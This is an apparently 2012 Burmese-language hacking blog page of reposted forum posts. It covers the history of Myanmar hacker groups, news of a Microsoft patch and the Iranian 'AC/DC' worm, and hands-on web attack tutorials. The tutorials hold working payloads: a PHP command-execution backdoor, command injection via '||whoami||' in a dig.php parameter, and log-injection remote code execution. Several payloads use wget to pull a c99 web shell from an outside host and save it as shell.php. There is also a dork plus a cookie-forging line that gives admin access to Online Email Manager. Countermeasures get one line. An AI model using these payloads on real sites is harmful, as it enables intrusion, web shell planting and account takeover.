Pages
▼
Pages - Menu
▼
Tuesday, July 31, 2012
Myanmar Hacker Evolution
Myanmar Hacker ဆိုတာနဲ႕ပတ္သတ္ရင္ ေတာ္ေတာ္မ်ားမ်ားက Blink Hacker Group ကိုပဲ ေျပးျမင္ၾကတယ္ ဟုတ္ပါတယ္ Blink Hacker Group ကို ဘယ္လိုပဲ ျမင္ျမင္သူတို႕ရဲ႕လုပ္ရပ္ေတြ ဟာ ဘာေတြပဲျဖစ္ျဖစ္ သူတို႕ဟာ Myanmar Hacker Evolution ( ျမန္မာ ဟက္ကာ အံုၾကြမႈ ) အေပၚ အေတာ္ၾကီးမားတဲ့ သက္ေရာက္မႈ ရွိခဲ့တယ္ဆိုတာပဲ.။
တကယ္ေတာ့ BHG မေပၚခင္ကတည္းက ျမန္မာ ဟက္ကာေတြရွိခဲ့တာပဲ ။ Planet Creator တို႕ YEHG ( YGN Ethical Hacker Group ) တုိ႕ လို Hacker Group ေတြလည္း ရွိခဲ့တာပဲ ။
ျပီးေတာ့ YEHG ကို DDos တုိက္လို႕ ျပႆနာေတြ တက္ကုန္တာမ်ိဳးလို Hacker တိုက္ပြဲေတြလည္း ရွိခဲ့ဖူးတာပဲ ။ MMSO လို Hacker Forum သီးသန္႕ မဟုတ္ေသာ္လည္း Hacking & Security Forum ေတြရွိခဲ့တာပဲ ။ မဇၩိမ ကို DDos တုိက္ခဲ့ျပီး Cyber War အသြင္ လုပ္တာလည္း ရွိခဲ့ဖူးတာပဲ ။ ဒီအထိ Hacker Evolution ( ဟက္ကာ အံုၾကြမႈ ) ဆိုတာမ်ိဳးျဖစ္မလာေသးဘူး ။
၂၀၁၂ Anonymous , Wikileaks , lulz တို႕ေက်းဇူးနဲ႕ ကမၻာလံုးဆုိင္ရာ Hacker အံုၾကြမႈၾကီးက ျမန္မာႏုိင္ငံကို ရိုက္ခတ္လာတယ္လို႕ပဲ ေျပာရမလား . ?? Blink Hacker Grop ဆိုျပီး အဖြဲ႕အစည္း တစ္ခု ေပၚလာတယ္ ။ စလာတုန္းကေတာ့ စစ္အစိုးရနဲ႕ပတ္သတ္တဲ့ မီဒီယာ ေတြကို တိုက္ခုိက္မယ္ဆိုတဲ့ အေၾကာင္းျပခ်က္နဲ႕ ေခတ္လူငယ္ Website ကို စတင္ တိုက္ခိုက္ခဲ့တယ္ ။ YTP ကို DDos နဲ႕ တိုက္ခုိက္တယ္လို႕ ေၾကညာခဲ့တယ္ ။ ဒီမွာပဲ နည္းပညာသမားေတာ္ေတာ္မ်ားမ်ားအျပင္ ႏိုင္ငံေရးသမားေတြ အျခား နည္းပညာ နယ္က မဟုတ္တဲ့လူေတြရဲ႕ အာရံုစိုက္မႈကို ရရွိခဲ့တယ္ ။ နည္းပညာနယ္ပယ္ရဲ႕ အျပင္ဘက္က လူေတြရဲ႕ ဦးေႏွာက္ထဲမွာ ျမန္မာဟက္ကာ ဆိုတဲ့ အေတြးအေခၚတစ္ခုကို ထည့္ေပးခဲ့တယ္ ။
BHG စတင္တည္ေထာင္ျပီး 1st Generation အဆံုးသတ္ခါနီးမွာ Myanmar Hacker Forum တစ္ခု တည္ေထာင္ဖို႕ၾကိဳးစားၾကတယ္ ။ ဒါေပမယ့္ အေၾကာင္းအမ်ိဳးမ်ိဳးေၾကာင့္ အဲ့ဒီ့ဖိုရမ္ ျပီးဆံုးမသြားဘူး ။ ဒီေတာ့ ပထမဆံုး ျမန္မာ ဟက္ကာ ဖိုရမ္ကို ေျပာဆုိရင္ အဲ့ဒီ့ ဖုိရမ္ကို ျပရလိမ့္မယ္ ။ ေအာင္ျမင္တာ မေအာင္ျမင္တာ က တစ္ေၾကာင္းေပါ့ ။
BHG 1st Generation က Myanmar Website ေတြကို စတင္တိုက္ခိုက္ေနတဲ့အခ်ိန္မွာပဲ Myanmar Hacker University ဆုိျပီး wall.fm အေျခစိုက္ ဆုိဒ္တစ္ခု ထြက္လာပါတယ္ ။ BHG ထက္စာရင္ သူတုိ႕က ပိုျပီး Open ျဖစ္ပါတယ္ ။ သို႕ေသာ္လည္း ပညာအဆင့္အတန္းမွာေတာ့ နိမ့္က်ပါေသးတယ္ ။ အားရစရာေကာငး္တာတစ္ခုကေတာ့ စည္းလံုးမႈပါပဲ ။ သူတုိ႕ အလြန္စည္းလံုးပါတယ္ ။ ကၽြန္ေတာ့္အျမင္မွာ ရိုင္းပင္းတယ္ လို႕ ျမင္တယ္ ။ ေနာက္ပိုင္း သူတို႕ Myanmar Hacker Forums ဆိုျပီ Hack Forums တစ္ခု တည္ေထာင္လိုက္ပါတယ္ ။ ပထမဆံုး မဟုတ္ေသာ္လည္း Active အျဖစ္ဆံုး အၾကီးမားဆံုး ဖုိရမ္လို႕ ေျပာရပါလိမ့္မယ္ ။
ဒီလိုနဲ႕ BHG 1st Generation ပ်က္စီးသြားပါတယ္ ။ သူတို႕ အဖြဲ႕ဖ်က္ေၾကာင္း ေၾကညာျပီး မၾကာခင္မွာပဲ Myanmar Cyber Army ဆိုတာ ေပၚလာျပီး Myanmar Website ေတြကို တိုက္ခုိက္ျပန္တယ္ ။ ဒါ နည္းနည္းေတာ့ တိုက္ဆိုင္မႈက ၾကီးမားသလို ခံစားရပါတယ္ :-P
သိပ္မၾကာပါဘူး Blink Hacker Group ကပဲ 2nd Generation အျဖစ္ လံုျခံဳေရးအရ အားနည္းေသာ မည္သည့္ Website ကိုမဆို တိုက္ခိုက္မယ္ဆိုျပီး ျပန္လည္ ထြက္ရွိလာပါတယ္ ။ ဒီအခ်ိန္ Myanmar Hacker Uniteam ဟာ လူသိမ်ားျခင္းမရွိေသးပါဘူး ။ ဒီအခ်ိန္မွာ Operation BD ဆိုတဲ့ Operation တစ္ခု Myanmar Uniteam က စတင္ခဲ့ပါတယ္ ။ Myanmar Hacker Uniteam က လူေတြ BD Website ေတြကို တိုက္ခိုက္ေနခ်ိန္မွာ BHG ဟာ Myanmar Website တစ္ခုကို တိုက္ခုိက္ျပီး BD Hacker ေတြကို Greetz လုပ္ခဲ့လို႕ အညိဳျငင္ခံခဲ့ရပါေသးတယ္ ။
ရိုဟင္ဂ်ာကိစၥမွာေတာ့ Myanmar Hacker Uniteam , BHG အပါအ၀င္ ျမန္မာဟက္ကာအေရးလႈပ္ရွားသူေတာ္ေတာ္မ်ားမ်ား စုစည္းမိလာပါတယ္ ။ ဘဂၤလားေဒ့ရွ္ Website ေတြကို တိုက္ခိုက္ရင္း ဆႏၵျပဳၾကပါတယ္ ။ အျခား နည္းပညာသမားေတြအျပင္ နည္းပညာအျပင္ဘက္ကလူေတြပါ Hacking နဲ႕ပတ္သတ္တဲ့ Information ေတြ Source ေတြကို ျမန္မာလိုေသာ္လည္းေကာင္း မွ်ေ၀ျခင္းမ်ားျဖင့္ လြယ္လြယ္ကူကူရရွိလာပါတယ္ ။ ဥပမာ DDos လိုဟာမ်ိဳးေပါ့ အတိအက် အေသအခ်ာေတြမသိေသာ္လည္း DDos ကို ျခံဳသိလာတယ္ DDos Tool ေတြအေၾကာင္းသိလာတယ္ ။ Myanmar Cyber Army ဆိုတဲ့ ေခါင္းစဥ္ေအာက္မွာ Hacktivist ေတာ္ေတာ္မ်ားမ်ား စု၀င္လာတယ္ ။
ဒီေတာ့ ျခံဳၾကည့္ရင္ BHG ဟာ နည္းပညာ သမားေတြအပါအ၀င္ နည္းပညာနယ္ပယ္အျပင္ဘက္ကလူေတာ္ေတာ္မ်ားမ်ားရဲ႕ ေခါင္းထဲကို ျမန္မာဟက္ကာဆိုတဲ့ စကားလံုးရိုက္သြင္းေပးႏုိင္ခဲ့ျပီး MM Hack Forums ကေတာ့ ပညာေတြမွ်ေ၀တဲ့ေနရာမွာ အဓိကက်လာပါတယ္
copy from Ghostarea.net
Microsoft to patch three critical vulnerabilities on Tuesday
ျပီးခဲ့တဲ့ တစ္ပတ္ အဂၤါေန႕ က Microsoft Security TechCenter ထိပ္တန္းအဆင့္ ရိွ vulnerabilities (ယိုေပါက္မ်ား၊အားနည္းခ်က္ေနရာမ်ား) ကိုတရား၀င္ ေက်ညာခ်က္ထုတ္ျပန္ ခဲ့ပါတယ္..ထိုသို႕ေက်ညာခ်က္ထုတ္ျပန္ရာတြင္..အထူးအေရးၾကီးေသာထိပ္ထန္းအဆင့္ယိုေပါက္ မ်ားအျပင္…ေနာက္ထပ္အေရးၾကီးေသာ အားနည္းခ်က္ယိုေပါက္ (၆) ခုကိုလဲတစ္ခါထဲ ထုတ္ျပန္ေက်ညာခ်က္ေပးခဲ့ပါတယ္…။ထိုသို႕ထုတ္ျပန္ရာတြင္ အားနည္းခ်က္ (၉) ခုစလံုးကိုတစ္ခါတည္းေဖာ္ျပထားျပီးေတာ့ ..အဲဒီ ထဲ က(၃)ခုဟာ…Critical အဆင့္ရိွေၾကာင္းႏွင့္ က်န္(၆) ခုမွာ Important အဆင့္ျဖစ္ေၾကာင္း တရာ၀င္ေၾကညာ စာတမ္း ထုတ္ျပန္ခဲ့တာျဖစ္ပါတယ္…။
ထိုကဲ့သို႕ (Critical) အဆင့္ရိွ အထူးအေရးၾကီးေသာအားနည္းခ်က္ ယိုေပါက္(၃) ခုထဲတြင္ စိတ္၀င္စားစရာအေကာင္းဆံုးအခ်က္မွာ..ထိုယိုေပါက္အားနည္းခ်က္(၃) တစ္ခုေသာယိုေပါက္ ဟာ Explorer 9 တြင္ပါ၀င္ေနျခင္းျဖစ္ပါတယ္…။ဒိထက္ပိုျပီးစိတ္၀င္စားစရာေကာင္းတာတစ္ခ်က္က ဒီအားနည္းခ်က္ယိုေပါက္ဟာ Microsoft ထုတ္ကုန္ Browser ေတြထဲက အရင္ တုန္းက ထုတ္လုပ္ခဲ့တဲ့ version ေတြထဲမွာမရိွခဲ့ဘူးဆိုတာပါပဲ..။ဒီယိုေပါက္ဟာ ခုမွေရႊထီးေဆာင္းျပီးေရာက္လာတဲ့အတြက္ နည္းနည္းေတာ့ ေမးခြန္း ထုတ္ခ်င္ စရာေတာ့ေကာင္းပါတယ္…။
ေနာက္ထပ္ (Critical) အဆင့္ရိွအားနည္းခ်က္ယိုေပါက္ ႏွစ္ခုကေတာ့ အရမ္း အႏၱရာယ္မ်ားတဲ့ malicious user ေတြကို Windows operating systems ထဲကို execute code မ်ားကို ထည့္သြင္း ၀င္ေရာက္ခြင့္ျပဳျပီးေတာ့ ထိန္းခ်ဳပ္ခြင့္ ျပဳေစျခင္းျဖစ္တယ္လို႕ အဲဒီ ထုတ္ျပန္ေက်ညာ စာတမ္းမွာေဖာ္ျပထားပါတယ္…။အဲဒီယိုေပါက္ေတြဟာ Window OS မွာ server ( ထိန္ခ်ဳပ္သူ) ႏွင့္ client ( ထိန္ခ်ဳပ္ခံရျခင္း/သူ) တို႕ကို ပါ support ျပဳလုပ္ေပးထားပါတယ္…။
“အမ်ားေမွ်ာ္လင့္ထားတဲ့အတိုင္း ယခုအခ်ိန္မွာျပင္းထန္ယိုေပါက္တစ္ခုျဖစ္လာတဲ့ Microsoft XML Core Services မွ အားနည္းခ်က္ ယိုေပါက္ဟာ CVE-2012-1889 ( CVE =Common Vulnerabilities and Exposures ) ,( CVE-2012-1889 ဆိုတာ CVE ID တစ္ခုျဖစ္) မွာထင္ေပၚလာကာ ျပဳျပင္ ဖာေထးရမယ့္အခ်က္ တစ္ခ်က္ျဖစ္လာ ျပီလို႕ “Vulnerability Management and Penetration Testing service တစ္ခုျဖစ္ေသာ Rapid7 မွသုေတသနျပဳလုပ္သူတစ္ေယာက္ျဖစ္တဲ့ Marcus Carey ကထုတ္ေဖာ္ေျပာၾကားခဲ့ပါတယ္…။
ျပည့္ စံုစြာေလ့လာခ်င္သူမ်ားအတြက္ အခ်က္အလက္အျပည့္အစံုကို Microsoft ရဲ႕ တရား၀င္ security ပိုင္းဆိုင္ရာထုတ္ျပန္ခ်က္မ်ားကို အပတ္စဥ္ အဂၤါေန႕တိုင္းသြားေရာက္ ေလ့လာႏိုင္ပါတယ္…။
Go Here
posted by Me
You also see in ghostarea.net
ref: thehackernew
Iranian nuclear program hit by AC/DC virus
အီရန္မွာရိွတဲ့ Nuclear Program ေတြထိန္းခ်ဳပ္လုပ္ကိုင္ေနလွ်က္ရိွေသာ computer systems သည္ ထူးဆန္းစြာ တိုက္ခိုက္ခံခဲ့ရေၾကာင္း…သတင္းတစ္ရပ္ကဆိုခဲ့ပါတယ္..။တိုက္ ခိုက္ေသာ virus မွာ AC/DC virus လို႕ အမည္းေပးထားျပီး worm အမ်ိဳးအစားျဖစ္ပါတယ္..။ထိုသို႕တိုက္ခိုက္ခံရျခင္းသည္..ၾကိဳတင္သတင္း အခ်က္အလက္ရရိွခဲ့ျပီးမွ ေပါ့ေလ်ာ့မႈ ေၾကာင့္ ျဖစ္ပြားခဲ့ေၾကာင္းလဲသိရိွရပါသည္.။
သတင္းအခ်က္အလက္အျပည့္အစံုမွာ…
အီရန္ႏိုင္ငံ ရိွ Nuclear ဆိုင္ရာအဖဲြ႕အစည္းတစ္ခုျဖစ္ေသာ Atomic Energy Organisation ၏ scientist တစ္ေယာက္၏ေျပာၾကားခ်က္အရ computer systems ေတြဟာ cyber-attack ျပဳလုပ္ခံခဲ့ရတယ္ လို႕ ဖြင့္ခ်ေျပာၾကားခဲ့ပါတယ္..။ထိုသို႕ တိုက္ခိုက္ရာတြင္နာမည္ၾကီး AC/DC အဖြဲ႕ ၏ Thunderstruck သီခ်င္းသည္..မယံုၾကည္ႏိုင္ေလာက္ေအာင္ ညသန္းေခါင္ယံ အခ်ိန္တြင္ full volume အျပည့္ျဖင့္ play လုပ္ခဲ့ပါတယ္….။အဲဒီလိုထူးထူး ျခားျခားတိုက္ခိုက္ခံရျခင္းသည္..Stuxnet ဗိုင္းရပ္နဲ႕ တိုက္ခိုက္ခံရ ခဲ့ျပီးေနာက္ပိုင္း..အထူး ျခားဆံုးျဖစ္ရပ္ လဲျဖစ္ပါတယ္..။
ထိုတိုက္ခိုက္မႈဟာ သုေတသနျပဳသူတစ္ေယာက္ဆီကို Iran’s atomic energy organisation မွ လံုျခံဳေရးျမင့္မားေသာ လိႈ႕၀ွက္ email တစ္ေစာင္ေပးပို႕ သတိေပးျခင္း အျပီးတြင္ထူးဆန္းစြာျဖင့္တိုက္ခိုက္သြာျခင္းလဲျဖစ္ပါတယ္…။ထိုကဲ့သို႕ သတိေပးမႈေပးပို႕ျပီးေတာ့မွ တိုက္ခိုက္ျခင္ခံခဲ့ရမႈအတြက္ အနည္းငယ္မွ်ေမးခြန္းထုတ္ ဖြယ္ရိွဖြယ္ရိွပါတယ္…။ ထို သတိေပးပို႕ မႈ email တစ္စိတ္တစ္ပိုင္းကိုေဖာ္ျပရလွ်င္ ေအာက္ပါအတိုင္းျဖစ္ပါတယ္..။
“ကၽြန္ေတာ္ဟာ…ကၽြန္ေတာ္တို႕ရဲ႕ nuclear program လံုျခဳံေရးနဲ႕ပက္သက္ျပီးေတာ့ သတင္းအခ်က္အလက္တစ္ခုကို ေရးသာေပးပို႕လိုက္ရပါတယ္ .ကၽြန္ေတာ္တို႕ ရဲ႕ nuclear program ေနာက္ထပ္တစ္ၾကီမ္ တိုက္ခိုက္ဖို႕ ျပင္ဆင္ေနလွ်က္ရိွၾကျပီးေတာ့ အဲဒီတိုက္ခိုက္မႈအတြင္းမွာ worm အသစ္ ျဖင့္ တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..။ အဆိုပါ ဗိုင္းရပ္အသစ္သည္ ယိုေပါက္မ်ားကိုရွာေဖြျပီးေတာ့ ကၽြန္ေတာ္တို႕ရဲ႕ Natanz ျမိဳ႕က Nuclear စက္ရံုအျပင္ Qom ျမိဳ႕အနီးက Fordo ေထာက္ပံေရးစက္ရံုက automation network ကို shut down ျပဳလုပ္တိုက္ခိုက္သြားမွာျဖစ္ပါတယ္..”
လို႕စာေရးသားေပးပို႕ခဲ့ပါတယ္…။
အဲဒီ email ထဲမွာပဲ ” ဒီဗိုင္းရပ္ဟာထူးျခားစြာ သီးခ်င္းတစ္ပုဒ္ကို ဖြင့္လိမ့္မယ္” လို႕ လဲေျပာၾကားခဲ့ျပီးေတာ့ အဲဒီလိုတိုက္ခိုက္ခံရမယ္ဆိုရင္လဲ Attacker ေတြဟာ သူတို႕ ေႏွာက္ယွက္ ၀င္ေရာက္တိုက္ခိုက္ေန မႈကို Thunderstruck သီခ်င္းနဲ႕ ထုတ္ေဖာ္ေၾကညာလိမ့္မည္ျဖစ္ေၾကာင္းကို လဲ ထို email ထဲတြင္အျပည့္အစံုေရးသားေဖာ္ျပခဲ့ပါတယ္…။ထိုသို႕ တိုက္ခိုက္မႈဟာ တတိယ အၾကမ္းေျမာက္ျဖစ္ျပီးေတာ့ Iran ႏိုင္ငံရဲ႕ အညင္းပြားေနတဲ့ Nuclear ဆိုင္ရာ ျပသနာေတြ အတြက္ တိုက္ခိုက္မႈျဖစ္ေၾကာင္းလဲေျပာၾကားသြားခဲ့ပါတယ္…။
ထိုတိုက္ခိုက္မႈတြင့္ ဖြင့္ခဲ့ေသာသီခ်င္းဟာ Atomic Energy Organization of Iran (AEOI) ရဲ႕ မူ၀ါဒ ဆိုင္ရာ ကိုတိုက္မႈရံႈ ခ်မႈျဖစ္ပါတယ္…။ယခု တိုက္ခိုက္မႈဟာလဲ 2010 ခုႏွစ္ Stuxnet ဗိုင္းရပ္ တိုက္ခိုက္မႈအျပီး အလားတူ ပံုစံ အတိုင္းတိုက္ခိုက္ခံရတာျဖစ္ပါတယ္…။ဒီတိုက္ခိုက္မႈအတြက္ မည္သည့္အဖြဲ႕ အစည္းကမွ မိမိ တို႕လက္ခ်က္ပါလို႕ ၀န္ခံျခင္း ၊ ထုတ္ေဖာ္ေျပာဆိုျခင္းမရိွေသးပါဘူး…။
နည္းပညာရွင္ေတြကေတာ့ ယခုတိုက္ခိုက္ လာတဲ့ ဗိုင္းရပ္ဟာ ရိုရွင္းျပီးေတာ့ ေစ်းေပါေပါ open-source project တစ္ခုကိုေက်ာ္ျဖတ္ ၀င္ေရာက္လာ ျပီးေတာ့ ထိုဗိုင္ရပ္ဟာ software အတြင္းမွာရိွတဲ့ ယိုေပါက္ေတြကိုရွာ ေဖြခဲ့ျခင္းျဖစ္ေၾကာင္းကိုလဲ ၀န္ခံခဲ့ၾကပါတယ္…။
ဒီတိုက္ခိုက္မႈ အတြက္ ၾကိဳတင္ျပီးေတာ့ အသိေပးေျပာၾကားခဲ့ေသာ email အျပည့္အစံုမူရင္းမွာေအာက္ပါအတိုင္းျဖစ္ပါသည္..။
“I am writing you to inform you that our nuclear program has
once again been compromised and attacked by a new worm with exploits
which have shut down our automation network at Natanz and another
facility Fordo near Qom.
According to the email our cyber experts sent to our teams,
they believe a hacker tool Metasploit was used. The hackers had access
to our VPN. The automation network and Siemens hardware were attacked
and shut down. I only know very little about these cyber issues as I am
scientist not a computer expert.
There was also some music playing randomly on several of the
workstations during the middle of the night with the volume maxed out. I
believe it was playing ‘Thunderstruck’ by AC/DC.”
posted by me
You also see in ghostarea.net
ref: thehackernew
Remote Command Execution
Remote Command Execution ကိုလည္း Remote Code Execution လုိပဲ RCE လို႕ေခၚၾကပါတယ္ အေခၚအေ၀ၚဆင္သလို Attack လုပ္ပံုလည္း ဆင္တူပါတယ္ ။ Remote Command Execution ဆိုေတာ့အတိုင္း Remote Command ေတြ Execute လုပ္ခြင့္ေပးတာကို ဆိုလိုတာပါ ။
Code
<?php $cmd=$_GET['cmd']; system($cmd); ?>
ဒီလိုသာျဖစ္ေနရင္ ကၽြန္ေတာ္တို႕ www.site.com/index.php?cmd=whoami ဆိုျပီး whoami command ေပးရင္ Server User Name တက္လာပါလိမ့္မယ္ ။ အဲ့ဒီလိုပဲ Command Execute လုပ္ႏုိင္တဲ့ အျခားေသာ PHP Function ေတြလည္းရွိပါေသးတယ္ ။
အဲ့ဒါေတြကေတာ့
exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output
တို႕ျဖစ္ပါတယ္ ။
Command ေပးတဲ့ေနရာမွာ whoami လို Command မေပးပဲ wget http://www.sh3ll.org/c99.txt? -O shell.php လို We Get Command ေပးလိုက္ရင္ Shell ကိုယူျပီး .php အျဖစ္ Out Put FIle ထုတ္သြားမွာျဖစ္ပါတယ္ ။
www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php
အမွန္အတိုင္းေျပာရရင္ အေပၚက Example Vuln က Theory ဆန္လြန္းပါတယ္ ။ တကယ့္လက္ေတြ႕မွာျဖစ္သြားတာေလးေတြၾကည့္လိုက္ရေအာင္ ။
Example 1 :
Code from dig.php
<?php include("common.php"); showMenu(); echo '<br>'; $status = $_GET['status']; $ns = $_GET['ns']; $host = $_GET['host']; $query_type = $_GET['query_type']; // ANY, MX, A , etc. $ip = $_SERVER['REMOTE_ADDR']; $self = $_SERVER['PHP_SELF']; $host = trim($host); $host = strtolower($host); echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>"); echo '<pre>'; //start digging in the namserver system ("dig @$ns $host $query_type"); echo '</pre>'; } else { ?>
ကၽြန္ေတာ္တုိ႕စိတ္၀င္စားတာ အပိုင္းေလးတစ္ပုိင္းပါပဲ ။ Remote Command Execute လုပ္ခြင့္ရွိမယ့္ အပိုင္းေလးတစ္ပိုင္းပါ ။
$ns = $_GET['ns']; system ("dig @$ns $host $query_type");
အဲ့ဒီ့မွာ ns variable ဟာ Filer လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ Attacker က ၾကည့္တဲ့ Command Execute လုပ္ခြင့္ရွိပါတယ္ ။
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
whoami ဆိုတဲ့ Command ကို Execute လုပ္ဖို႕ၾကိဳးစားေပသိ Execute ျဖစ္သြားမွာမဟုတ္ပါဘူး အေၾကာင္းရင္းကေတာ့ Code က ဒီလိုသြားမွာျဖစ္မွာမို႕လို႕ပါ ။
system ("dig whoami ghostarea.net NS");
ဒီလို Command မရွိတဲ့အတြက္ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။ ဒီေတာ့ ကၽြန္ေတာ္တို႕ တမ်ိဳးစဥ္းစား၇ပါလိမ့္မယ္။ Terminal မွာ အသံုးျပဳခြင့္ရွိတဲ့ And Operator || ကို သံုးပါ့မယ္ ။
www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging
ဒါဆုိရင္ code က ဒီလိုျဖစ္သြားပါ့မယ္
system ("dig ||whoami|| ghostarea.net NS");
ဒီလိုဆိုမွ dig နဲ႕ ghostarea.net NS ၾကားမွာျခားျပီး Command အျဖစ္ Execute လုပ္သြားမွာျဖစ္ပါတယ္ ။
posted by negative thunder
copy from mhf
Remote Code Execution
Remote Code Execution ဆိုတာ RCE လို႕ အတိုေကာက္ေခၚၾကတဲ့ အေတြ႕ရမ်ားတဲ့ Web Vuln ေတြထဲက တစ္ခုျဖစ္ပါတယ္ ။
ထံုးစံအတုိင္း ဘယ္လိုေတြ ေပါက္လဲ ဘယ္လို ေနရာေတြမွာေပါက္သြားလဲ တစ္ခ်က္ၾကည့္ရေအာင္ ။
How Vulnerability comes?
Code
[color=#00ff00][size=1][font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]<?php[/font] [font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]$code=$_GET['code'];[/font] vuln[font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]($code);[/font] [font=Verdana,Arial,Tahoma,Calibri,Geneva,sans-serif]?>[/font][/size][/color]
Code ထဲက vuln ဆိုတဲ့ Function ဟာ string ကို PHP Code အျဖစ္နဲ႕ ေျပာင္းလဲေပးသြားမွာျဖစ္ျပီး အဲ့ဒါေၾကာင့္ ကၽြန္ေတာ္တုိ႕ဟာ Code ေတြကို Execute လုပ္ခြင့္ရွိမွာ ျဖစ္ပါတယ္
တကယ္ေတာ့ ဒီဟာက သီအိုရီဆန္လြန္းပါတယ္ လက္ေတြ႕မွာျဖစ္တတ္တဲ့ အေၾကာင္းအရာေလးေတြ ၾကည့္ရေအာင္
Type 1 :
Blog တစ္ခုထံုးစံအတုိင္း Comment ေပးတဲ့ေနရာ ရွိမယ္ ။
Comment Form ဆိုတဲ့အတိုင္း Submit Form နဲ႕ Comment.php ကို ခ်ိတ္ထားမယ္ေပါ့ ။ submit.php နဲ႕ comment.php ဆိုပါစို႕
Submit.php ကိုၾကည့္ရေအာင္
submit.php
Code:
[color=#00ff00][font=Times New Roman,serif][size=3]<[/size][/font][font=Times New Roman,serif][size=3]form method="POST" action="">[/size][/font] [font=Times New Roman,serif][size=3]<textarea rows="10" name="comments" cols="60"></textarea> <p><input type="submit" value="Post" name="sub"></p> </form>[/size][/font][/color]
Comment.php ကိုၾကည့္ရေအာင္
comments.php
Code:
<?php
[color=#00ff00][font=Times New Roman,serif][size=3]$comments = $_POST['comments']; $log = fopen('comments.php','a'); fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments); fclose($log); ?>[/size][/font][/color]
ဒီလိုဆိုရင္ submit form က သြင္းသမွ်ကို Comment.php မွာ သြားျပီး သက္ေရာက္ေနမွာျဖစ္ပါတယ္ ။ ဒါေၾကာင့္ Malicious Code ကို Inject လုပ္လုိက္ရင္ ျဖစ္လာမယ့္ အက်ိဳးဆက္က ????
အခုေျပာသြားတာက Post Method ကေန ေပါက္သြားတဲ့အေၾကာင္း Get Method ဆိုရင္ေရာ...
Type 2 :
Code:
[color=#00ff00][font=Times New Roman,serif][size=3]<?php $msg = $_GET['msg']; $ip = getenv('REMOTE_ADDR'); $error = fopen('errorlog.php','a'); fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />'); fclose($error); ?>[/size][/font][/color]
ဒီလိုေနရာမွာဆိုရင္ RCE သာမကဘူး XSS လိုဟာမ်ိဳးပါ Inject လုပ္ႏုိင္ပါမယ္ ။
အိုေခ ဒါဆို Attacker ဘယ္လို Attack လုပ္သြားတယ္ဆုိတာကို ဆက္ရေအာင္ ။
How they Attack?
Attacker က ခုနက Type 2 လို Get Method မွာ RCE ေပါက္ေနတာကို ေတြ႕ျပီဆိုပါစို႕ ဒါဆို String တစ္ေၾကာင္း ေခၚျပီး Attack လုပ္ပါမယ္ တျခားေနရာက Shell ကို ေခၚယူခိုင္းလိုက္တာမ်ိဳးေပါ့
www.site.com/vuln.php?hack=1 ဆိုပါစို႕
အဲ့လိုေနရာမွာ
www.site.com/vuln.php?hack=<?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?>
ေနာက္က <?system(‘wget http://www.sh3ll.org/c99.txt? -O shell.php’);?> ဆိုတာကို နည္းနည္းေျပာဖို႕ လိုမယ္ထင္ပါတယ္
wget ဆိုတာ we get ပါ တျခားေနရာက ယူမယ္ေပါ့ ဘာကို ယူမလ www.sh3ll.org/c99.txt ကို ယူမယ္
-O ဆိုတာ Out put အျဖစ္ထြက္ပါေပါ့ ဘယ္လို ထြက္ရမလဲ c99.txt ဆိုတဲ့ text file ကုိ shell.php ဆုိတဲ့ PHP File အျဖစ္ ထုတ္ပါလုိ႕ ေျပာလိုက္တာပါ .. ဒါဆို ဘာဆက္လုပ္မလ ဆိုတာ သိေလာက္ပါျပီ ;-)
Countermeasures
အကယ္၍မ်ား ; ကို ကန္႕သတ္လိုက္မယ္ဆိုရင္ PHP Code ေတြအလုပ္လုပ္ေတာ့မွာမဟုတ္ပါဘူး
post by negative thunder
copy from MHF
Insecure Cookie Handling
Web Server ေတြရဲ႕ Cookie Handle အလြဲကေန admin access ရယူသြားတဲ့ Vuln ျဖစ္ပါတယ္။
ဥပမာ vuln.php ရဲ႕ Code ကို တစ္ခ်က္ၾကည့္လိုက္ပါ ။
Code
if($_POST['password'] == $thepass) { setcookie("is_user_logged","1"); } else { die("Login failed!"); } ............ etc ................. if($_COOKIE['is_user_logged']=="1") { include "admin.php"; else { die('not logged'); }
သူ႕မွာ လြဲသြားတဲ့အေၾကာင္းအရာက "is_user_logged" ဆိုတဲ့ Variable ျဖစ္ပါတယ္ Browser ထဲက Cookie ရွိရင္ Vale 1 အျဖစ္သတ္မွတ္ျပီး Log in အ၀င္ခံလိုက္တဲ့ သေဘာပါ အဲ့ဒီ့မွာပဲ
javascript:document.cookie = "is_user_logged=1; path=/";
ဆိုျပီး Javascript Inject လုပ္လိုက္ရံုနဲ႕ Log in ၀င္ျပီးသားျဖစ္သြားပါ့မယ္ ။
Online Email Manager မွာ ေပါက္သြားတဲ့ Vuln အေၾကာင္းၾကည့္လုိက္ရင္ ပိုျပီး သေဘာေပါက္သြားမွာပါ ။
DorK : Powered by Online Email Manager
အဲ့ဒီ့မွာ http://www.site.com/demo/OEM/admin/index.php ဆိုပါစို႕ အဲ့ဒီ့မွာ
javascript:document.cookie = "auth=admin; path=/"; လို႕ Javascript Inject လုပ္လိုက္ျပီး emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )
ကိုသြားလိုက္ရံုနဲ႕ Admin အျဖစ္ Login ၀င္ေနျပီးသားျဖစ္တာ ေတြ႕မွာပါ
Ref : SirGod
post by negative thunder
copy from MHF
Friday, July 27, 2012
Phone Phreaking
